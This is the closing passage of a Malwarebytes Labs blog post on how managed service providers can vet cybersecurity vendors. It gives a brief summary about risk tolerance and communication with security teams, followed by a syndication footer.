To sum up, vetting vendors doesn’t have to be painful—as long as you know your own risk tolerance posture, and have a mature communication channel with your own security team.

The post Securing the MSP: best practices for vetting cybersecurity vendors appeared first on Malwarebytes Labs.

Categories: Malware Bytes